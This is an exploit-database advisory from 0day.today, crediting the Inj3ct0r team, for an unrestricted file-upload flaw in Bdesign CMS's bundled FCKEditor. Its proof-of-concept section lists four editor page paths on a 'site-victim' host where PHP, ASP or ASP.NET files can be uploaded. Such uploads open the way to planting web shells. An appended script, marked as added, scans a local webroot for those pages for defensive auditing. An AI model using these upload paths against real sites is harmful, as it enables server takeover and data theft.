0day Today Exploits Market and 0day Exploits Database

Bdesign CMS (FCKEditor) File Upload Vulnerability

Author: DoSs-Dz
Risk: Security Risk Medium
0day-ID: 0day-ID-17980
Category: web applications
Date add: 05-04-2012
Platform: php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  [»] Site            : 1337day.com                                     0
1  [»] Support e-mail  : submit[@]1337day.com                            1
0                                                                        0
1               +---------------------------------------+                1
0               |I'm DoSs-Dz Member From Inj3ct0r Team  |                1
1               +---------------------------------------+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+----------------------------------------------------------------------------+
# Exploit Title : Bdesign CMS (FCKEditor)  File Upload
# Date :  05 April 2012
# Vendor Site : http://www.dotnetcmsportal.com/DownloadHandler.ashx?pg=73eae689-84b6-45d2-8d63-8fcf0996a60a&section=d35e34d0-fe93-4f45-b283-f4333ab6968d&file=Bdesign.rar
# Tested On : Windows 7 Professional
# Big Thanks to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] Upload Exploit P0C =» 
   
   ------------------------------------------------------------------------------------
   First PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/uploadtest.html    ---- > Uploaded File URL: your file link
   You can upload with the PHP form, or ASP, or ASP.NET.
   ------------------------------------------------------------------------------------
   Second PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/test.html  ---- > Uploaded File URL: your file link
   You can upload with the PHP form, or ASP, or ASP.NET.
   ------------------------------------------------------------------------------------
   Third PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/browser.html   ---- > see it
   ------------------------------------------------------------------------------------ 
   Fourth PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/frmupload.html   ---- > see it
   -------------------------------------------------------------------------------------- 
+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]       |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gheurrara on : 05 april 2012     |
+------------------------------------+ 
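
For administrators of a site running this CMS, the following added example (not part of the original advisory) walks a local webroot and reports which of the four FCKEditor pages listed above are present on disk, so they can be reviewed. The function names and the sample directory tree are constructed for illustration.

```python
import os

# Pages named in the advisory, relative to the FCKEditor directory (lower-cased).
ADVISORY_PAGES = (
    "editor/filemanager/connectors/uploadtest.html",
    "editor/filemanager/connectors/test.html",
    "editor/filemanager/browser/default/browser.html",
    "editor/filemanager/browser/default/frmupload.html",
)

def resolve_case_insensitive(base, parts):
    """Follow parts below base, matching each component regardless of case."""
    current = base
    for part in parts:
        try:
            entries = os.listdir(current)
        except OSError:
            return None
        match = next((e for e in entries if e.lower() == part), None)
        if match is None:
            return None
        current = os.path.join(current, match)
    return current if os.path.isfile(current) else None

def find_exposed_pages(webroot):
    """Return sorted webroot-relative paths of advisory pages that exist on disk."""
    hits = []
    for dirpath, dirnames, _files in os.walk(webroot):
        for name in dirnames:
            if name.lower() != "fckeditor":
                continue
            base = os.path.join(dirpath, name)
            for page in ADVISORY_PAGES:
                found = resolve_case_insensitive(base, page.split("/"))
                if found:
                    hits.append(os.path.relpath(found, webroot).replace(os.sep, "/"))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed sample webroot: site_a ships two of the pages, site_b none."""
    files = (
        "site_a/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html",
        "site_a/admin/FCKeditor/editor/filemanager/browser/default/frmupload.html",
        "site_b/fckeditor/editor/fckeditor.html",
    )
    for rel in files:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
```

Call `find_exposed_pages()` with the path of the webroot to audit; `build_sample_tree()` only creates the constructed sample layout in a scratch directory.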



#  0day.today [2024-12-24]  #